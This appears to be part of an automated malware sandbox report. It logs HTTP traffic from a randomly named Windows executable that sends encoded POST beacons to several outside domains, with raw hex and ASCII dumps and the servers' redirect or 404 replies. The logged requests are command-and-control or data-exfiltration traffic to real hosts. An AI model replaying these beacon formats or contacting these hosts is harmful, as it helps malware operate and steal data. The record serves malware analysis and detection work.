                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.7499893.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:16.135421038 CEST668OUTPOST /qt7h/ HTTP/1.1
                                                                                                                Host: www.dto20.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.dto20.shop
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.dto20.shop/qt7h/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6f 58 35 31 57 38 56 35 46 68 62 72 2f 76 39 65 45 46 54 39 4b 55 71 58 38 51 48 7a 64 43 4a 51 53 79 45 74 71 38 35 45 51 46 53 53 65 71 49 75 4c 70 59 74 71 39 43 67 6e 71 55 65 4d 50 57 6a 69 6e 69 78 71 69 79 4b 72 66 68 57 39 4c 67 39 51 7a 70 76 30 31 66 5a 57 4b 59 32 57 47 54 68 4b 4c 69 51 71 4d 79 63 55 61 34 30 38 79 71 4a 48 43 6a 6c 31 75 31 50 6f 48 57 48 57 52 72 36 36 72 44 49 68 31 43 68 50 39 57 50 35 35 55 49 31 36 39 62 70 79 77 57 2f 57 59 72 71 57 78 6f 38 75 46 59 47 53 71 57 6c 56 37 6e 4f 76 71 4c 6a 36 4d 39 36 31 45 4b 42 73 6c 2f 6a 6c 79 6f 4a 5a 5a 6f 77 57 59 6f 48 74 47 6d 76 43 56 39 67 67 3d 3d
                                                                                                                Data Ascii: ZZY=oX51W8V5Fhbr/v9eEFT9KUqX8QHzdCJQSyEtq85EQFSSeqIuLpYtq9CgnqUeMPWjinixqiyKrfhW9Lg9Qzpv01fZWKY2WGThKLiQqMycUa408yqJHCjl1u1PoHWHWRr66rDIh1ChP9WP55UI169bpywW/WYrqWxo8uFYGSqWlV7nOvqLj6M961EKBsl/jlyoJZZowWYoHtGmvCV9gg==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.7499903.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:18.697254896 CEST688OUTPOST /qt7h/ HTTP/1.1
                                                                                                                Host: www.dto20.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.dto20.shop
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.dto20.shop/qt7h/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6f 58 35 31 57 38 56 35 46 68 62 72 2b 4c 42 65 49 47 37 39 4e 30 71 51 7a 77 48 7a 57 69 4a 55 53 79 49 74 71 34 4a 55 54 78 2b 53 65 50 30 75 49 6f 59 74 76 39 43 67 76 4b 55 66 44 76 58 76 69 6e 76 4d 71 67 6d 4b 72 66 6c 57 39 4c 77 39 51 6c 68 67 6c 31 66 48 44 61 59 30 62 6d 54 68 4b 4c 69 51 71 4d 50 4a 55 61 77 30 38 69 36 4a 48 6e 58 6d 32 75 31 4d 74 33 57 48 63 42 72 2b 36 72 44 32 68 30 65 62 50 35 6d 50 35 37 63 49 32 76 64 59 67 79 77 51 68 6d 5a 41 70 48 51 32 31 63 46 48 41 30 36 41 37 31 48 35 47 35 33 70 35 59 41 52 6b 6b 38 78 46 75 42 4a 30 44 76 64 4c 59 64 77 39 30 73 4a 59 61 6a 4d 69 51 30 35 32 51 74 52 58 67 59 6f 75 46 77 31 51 30 55 32 56 74 41 6d 77 73 45 3d
                                                                                                                Data Ascii: ZZY=oX51W8V5Fhbr+LBeIG79N0qQzwHzWiJUSyItq4JUTx+SeP0uIoYtv9CgvKUfDvXvinvMqgmKrflW9Lw9Qlhgl1fHDaY0bmThKLiQqMPJUaw08i6JHnXm2u1Mt3WHcBr+6rD2h0ebP5mP57cI2vdYgywQhmZApHQ21cFHA06A71H5G53p5YARkk8xFuBJ0DvdLYdw90sJYajMiQ052QtRXgYouFw1Q0U2VtAmwsE=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.7499913.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:21.247864008 CEST1701OUTPOST /qt7h/ HTTP/1.1
                                                                                                                Host: www.dto20.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.dto20.shop
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.dto20.shop/qt7h/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6f 58 35 31 57 38 56 35 46 68 62 72 2b 4c 42 65 49 47 37 39 4e 30 71 51 7a 77 48 7a 57 69 4a 55 53 79 49 74 71 34 4a 55 54 77 71 53 65 36 34 75 4b 4c 41 74 73 39 43 67 7a 61 55 6b 44 76 57 31 69 6e 6e 49 71 67 37 39 72 64 74 57 38 74 38 39 46 67 42 67 73 31 66 48 42 61 59 70 57 47 53 6c 4b 4c 53 55 71 49 76 4a 55 61 77 30 38 6b 32 4a 4f 53 6a 6d 37 4f 31 50 6f 48 57 54 57 52 72 53 36 76 75 4f 68 31 72 73 61 61 75 50 2b 62 73 49 36 38 31 59 72 79 77 53 67 6d 5a 59 70 48 63 58 31 63 4a 39 41 30 6d 75 37 79 6a 35 58 59 4b 51 71 4d 45 77 2b 79 30 5a 62 2b 5a 2b 79 67 44 55 46 70 78 33 31 33 4d 77 61 70 6d 35 37 42 31 74 33 47 6f 70 58 32 38 72 6d 6e 41 6c 62 55 68 68 49 2b 46 6a 79 5a 58 79 71 32 4a 35 7a 34 71 63 63 66 49 6c 46 2f 70 51 64 32 42 4b 52 67 72 41 52 6c 45 36 38 77 68 61 42 2b 34 66 58 39 65 53 79 35 4f 4c 75 31 42 4b 44 73 2f 6f 4f 32 5a 31 34 75 67 6d 2f 66 37 37 70 66 64 2f 55 6b 34 66 2b 6c 42 6f 57 4e 62 73 2b 44 59 35 31 4e 78 6e 77 4b 63 5a 34 2b 6d 46 67 48 4d 4e 71 4d [TRUNCATED]
                                                                                                                Data Ascii: ZZY=oX51W8V5Fhbr+LBeIG79N0qQzwHzWiJUSyItq4JUTwqSe64uKLAts9CgzaUkDvW1innIqg79rdtW8t89FgBgs1fHBaYpWGSlKLSUqIvJUaw08k2JOSjm7O1PoHWTWRrS6vuOh1rsaauP+bsI681YrywSgmZYpHcX1cJ9A0mu7yj5XYKQqMEw+y0Zb+Z+ygDUFpx313Mwapm57B1t3GopX28rmnAlbUhhI+FjyZXyq2J5z4qccfIlF/pQd2BKRgrARlE68whaB+4fX9eSy5OLu1BKDs/oO2Z14ugm/f77pfd/Uk4f+lBoWNbs+DY51NxnwKcZ4+mFgHMNqMcu5Unv+LcE3FOcXNloXhimq5dNv2ghQlbRHOSddz0p3rFRZAhywdXmBXCMoU3o/bMwMTyl6d9nZc9j3nnpTGcsAaEvrtMw2ptLBPTDvAQ3FU7lovBaS4FZIPJErteAc2yKVgR5c2/WXS58y+KqWgigpoEf5fBl1V72ha7Cc1SdMaXEPocoxfVOqNVibEsWKtZI6+YMUhzmdWQk/hYVI0QFOrqiW5WKccVpCOexAsLDYkG9hNsLpXIMF5YhIsB932JO44vE2R9KEJPNJfAciqbfgwWwItJdwjbcKunt8TPeUfYdPInjS4v3Kggi3Z/i6qtforvNdRXa6uDlj07Y42315LURR87fFfhqrYMO6ywaMQM72JPP8alpFWC7DtJPC7TpbRRb0AgsP3gv6sc6no+yk1bMfZtoOIUb5YxNniYhkdEA9qF+I1YadM7F6iR/Ee1w7R6PAo6pSu30M/SCdrnhNTYujhUWhlF4Uys3b/27xyneuF4dx3FaottE544V+KitOJogrZl8zLuYxwEgfAwu3sVGPiTdmPjBm4jxmMiGrUkLsRZPpEzyqVjiIbzZ8ioFTwZ6VXTp6Jz966yXIW/n2TYEcSZFmlIQd3Mf7WPRhgpkiEjnfbz0BO23a1+6mvratfJXagMeLOenPfCmhAAtUpGw4XFhzF90 [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.7499923.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:23.793776035 CEST413OUTGET /qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O HTTP/1.1
                                                                                                                Host: www.dto20.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:07:24.238322973 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:07:24 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 26 5a 5a 59 3d 6c 56 52 56 56 49 5a 73 58 53 50 55 34 61 49 59 4c 57 33 75 58 55 32 47 39 6a 79 4a 56 42 30 4b 63 53 34 2f 72 34 4e 63 66 6e 71 59 49 62 31 32 53 61 63 34 6a 74 79 6a 6d 4b 6b 78 4c 49 61 71 76 46 44 75 6e 69 2f 34 71 34 51 38 38 6f 30 59 48 30 78 77 6f 6c 76 37 48 70 63 50 48 47 36 69 65 72 36 35 34 36 2f 4e 45 49 52 30 39 7a 44 76 48 46 33 66 39 65 46 78 71 31 62 37 61 77 62 2f 38 39 43 51 67 31 69 41 4b 4b 2b 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O"}</script></head></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.74999376.223.67.189801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:37.486776114 CEST689OUTPOST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 52 61 2b 4d 36 65 67 32 32 79 6a 71 4b 63 34 74 70 43 6b 42 63 68 6e 4d 56 79 73 6b 49 35 57 4a 6b 68 50 57 30 72 57 68 45 46 66 35 49 63 32 69 70 38 46 4d 71 6f 32 53 4d 55 6b 6d 55 72 42 43 41 42 52 61 39 35 4f 54 58 6f 44 76 63 4e 62 66 50 63 73 6d 56 32 4e 4b 42 47 31 34 78 78 2f 38 37 66 54 2f 54 79 56 62 65 31 59 51 31 32 4a 48 46 32 2b 63 47 53 79 38 68 61 6f 70 43 6f 49 41 59 59 2f 4a 34 34 46 57 45 49 37 64 55 72 4b 48 6c 47 6d 49 75 61 63 6f 32 66 4f 46 44 43 67 4a 4b 33 43 73 6d 62 54 4e 4c 56 7a 2f 57 64 38 78 70 61 79 58 2b 51 69 54 78 44 44 33 4a 78 52 42 54 30 41 48 33 51 3d 3d
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcRa+M6eg22yjqKc4tpCkBchnMVyskI5WJkhPW0rWhEFf5Ic2ip8FMqo2SMUkmUrBCABRa95OTXoDvcNbfPcsmV2NKBG14xx/87fT/TyVbe1YQ12JHF2+cGSy8haopCoIAYY/J44FWEI7dUrKHlGmIuaco2fOFDCgJK3CsmbTNLVz/Wd8xpayX+QiTxDD3JxRBT0AH3Q==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.74999476.223.67.189801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:40.030057907 CEST709OUTPOST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 51 37 4f 4d 38 4a 38 32 39 79 6a 74 58 73 34 74 2b 53 6c 70 63 68 62 4d 56 77 42 68 49 76 6d 4a 6c 44 48 57 36 4b 57 68 4a 6c 66 35 43 38 32 64 32 73 46 39 71 6f 72 68 4d 52 6b 6d 55 72 46 43 41 46 64 61 39 4c 6d 51 46 49 44 74 52 74 61 5a 4c 63 73 6d 56 32 4e 4b 42 47 77 6c 78 78 48 38 37 50 6a 2f 42 51 74 59 64 31 59 54 79 32 4a 48 50 57 2b 59 47 53 79 65 68 59 63 50 43 73 34 41 59 59 50 4a 34 70 46 56 4b 49 37 66 59 37 4c 32 70 6d 2f 76 6f 2f 67 67 35 63 32 34 4c 54 51 44 50 42 66 4f 38 35 66 68 56 45 4c 45 53 66 59 48 2b 38 76 69 38 52 6d 4c 38 68 33 57 57 47 30 72 65 6d 68 44 68 67 43 47 54 47 70 55 39 76 4c 35 30 79 70 4d 4d 2b 38 44 49 77 45 3d
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcQ7OM8J829yjtXs4t+SlpchbMVwBhIvmJlDHW6KWhJlf5C82d2sF9qorhMRkmUrFCAFda9LmQFIDtRtaZLcsmV2NKBGwlxxH87Pj/BQtYd1YTy2JHPW+YGSyehYcPCs4AYYPJ4pFVKI7fY7L2pm/vo/gg5c24LTQDPBfO85fhVELESfYH+8vi8RmL8h3WWG0remhDhgCGTGpU9vL50ypMM+8DIwE=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.74999576.223.67.189801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:42.577312946 CEST1722OUTPOST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 51 37 4f 4d 38 4a 38 32 39 79 6a 74 58 73 34 74 2b 53 6c 70 63 68 62 4d 56 77 42 68 49 73 47 4a 6b 32 4c 57 36 74 43 68 47 46 66 35 4f 63 32 59 32 73 46 67 71 6f 6a 2b 4d 52 59 32 55 70 4e 43 43 6d 56 61 30 66 79 51 63 34 44 74 59 4e 62 65 50 63 73 33 56 32 64 47 42 47 67 6c 78 78 48 38 37 4d 72 2f 58 79 56 59 62 31 59 51 31 32 4a 4c 46 32 2b 77 47 53 71 6b 68 59 49 35 44 64 45 41 62 34 66 4a 72 72 74 56 47 49 37 42 5a 4c 4c 75 70 6d 44 77 6f 37 4a 62 35 64 53 65 4c 51 41 44 50 32 36 36 73 4b 54 31 4c 57 6e 33 62 2b 6b 41 34 74 66 50 36 43 79 6b 38 6a 36 74 66 57 51 2b 51 6b 64 6f 72 31 62 53 4a 67 52 48 6c 72 6d 73 31 32 4d 6c 66 4f 73 58 62 6e 6c 4a 33 68 64 66 31 31 41 57 73 68 34 52 68 70 79 45 43 6e 68 76 4b 47 42 43 34 43 65 53 77 4a 37 63 4f 75 53 59 63 76 4b 62 74 50 6e 44 73 78 58 53 48 65 78 38 69 53 61 50 69 50 7a 71 52 44 6e 5a 36 6c 6c 76 68 33 75 45 43 65 71 73 76 58 51 48 6c 6c 4e 51 5a 6a 67 30 59 5a 71 64 33 78 51 49 30 46 74 53 2b 50 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcQ7OM8J829yjtXs4t+SlpchbMVwBhIsGJk2LW6tChGFf5Oc2Y2sFgqoj+MRY2UpNCCmVa0fyQc4DtYNbePcs3V2dGBGglxxH87Mr/XyVYb1YQ12JLF2+wGSqkhYI5DdEAb4fJrrtVGI7BZLLupmDwo7Jb5dSeLQADP266sKT1LWn3b+kA4tfP6Cyk8j6tfWQ+Qkdor1bSJgRHlrms12MlfOsXbnlJ3hdf11AWsh4RhpyECnhvKGBC4CeSwJ7cOuSYcvKbtPnDsxXSHex8iSaPiPzqRDnZ6llvh3uECeqsvXQHllNQZjg0YZqd3xQI0FtS+PQsxgFvfUCZvm48+fHhnydDp77UIfKpe7Gndk6nwgBQcFHANwmHitnv+ZlYwiQnfvynufckPBF8tkCTSicQGnBbAo0dQs6OJ5AfN2trmBrePyRiHZRSK1POSymeWCRBQHbYYdtFT2S61doa+EKoka9NO1SyDHlWtomPrm8PjJywy6CYuimZ0Hwg6rYTz7kArndHNjoDiOsR+OxL4Z7gPchLd2iOofRZcBAAN7P1CL6Ct+SfZfAxl6mufMxgtRcCgGMuoG0M2mRd+GEb+1B4rHccTdjl/S0/577KPOFWd1a5B3/UrrO/uaiNQFVE98T16t9lBkOVPvsvEunqlcqx9ZaVMcpfgomrg1kVHZOb8QD8BrGH+49F6hxK4B6NVsKk/QUD78BqOPS5YUnriTziQGs+EX3w1l57Tpn4B6WYevqUw+U9y8KNfZ9vUnGkQODRoUJM/PmfXQ2G0y7EdqKElF0NFxyD4z/eySnZWxa2QjeDe2aM8lPRXF2spOINhfhSYqwYWxnLurkU85t8yRUnIC+TVBoyv3qrzlAgqeYbpRr/n3jxesiXK4KMlyMLpvCczFJ/9fBa5gDt6KqgEoM6OhQee1ZxJydBIryqgBU0NbLaj7hIrWUYMVtD/pnbWeUr5YNzODaJi9/YpSljL1zpIFdJxycFMR5JUGf8 [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.74999676.223.67.189801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:45.118097067 CEST420OUTGET /jso9/?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:07:45.587131023 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:07:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 26 5a 5a 59 3d 75 57 74 44 37 6e 44 4a 7a 43 35 4b 62 61 65 59 74 34 77 7a 6a 77 54 37 64 66 4e 76 6d 68 63 42 58 44 6a 43 57 44 74 44 62 2b 69 77 34 79 4b 46 75 4a 75 66 46 48 4c 4a 41 64 69 33 70 4c 70 64 36 5a 53 78 4e 6a 4d 59 4c 65 4e 4c 4b 6b 4e 50 38 50 43 4b 5a 4f 48 51 51 4d 69 75 66 59 55 35 61 6d 6f 64 59 56 52 79 68 55 32 51 37 5a 4b 32 64 79 35 61 55 69 51 64 39 57 49 71 47 45 75 77 47 41 2f 41 6d 4a 77 62 45 4c 52 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk"}</script></head></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.74999723.227.38.74801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:50.720276117 CEST674OUTPOST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 68 73 33 30 71 6f 65 68 61 73 36 77 59 2f 78 50 53 6f 49 49 38 68 4d 52 62 5a 39 48 79 78 73 6f 45 41 58 4b 70 59 4f 31 2b 77 66 67 57 63 43 2f 56 62 38 50 47 4e 2b 42 4b 74 52 41 76 44 44 31 49 54 63 66 58 72 35 37 4d 43 38 73 77 62 30 77 66 4c 77 4a 42 6c 70 72 43 6e 4b 36 7a 58 76 51 4e 46 43 61 30 75 63 69 68 39 68 42 54 4e 6b 79 63 49 58 53 77 6e 63 67 67 51 2f 31 6d 30 61 50 55 45 55 2f 6a 54 73 31 66 43 66 59 37 45 4a 2b 51 52 69 46 32 50 69 68 64 45 75 67 78 69 6d 4c 33 4d 47 57 7a 30 64 30 68 6d 6f 61 44 6a 72 49 31 77 6f 66 42 51 56 6c 70 71 59 72 68 6f 57 70 62 64 2f 65 58 67 3d 3d
                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPhs30qoehas6wY/xPSoII8hMRbZ9HyxsoEAXKpYO1+wfgWcC/Vb8PGN+BKtRAvDD1ITcfXr57MC8swb0wfLwJBlprCnK6zXvQNFCa0ucih9hBTNkycIXSwncggQ/1m0aPUEU/jTs1fCfY7EJ+QRiF2PihdEugximL3MGWz0d0hmoaDjrI1wofBQVlpqYrhoWpbd/eXg==
                                                                                                                Oct 9, 2024 14:07:51.686175108 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:51 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Lax
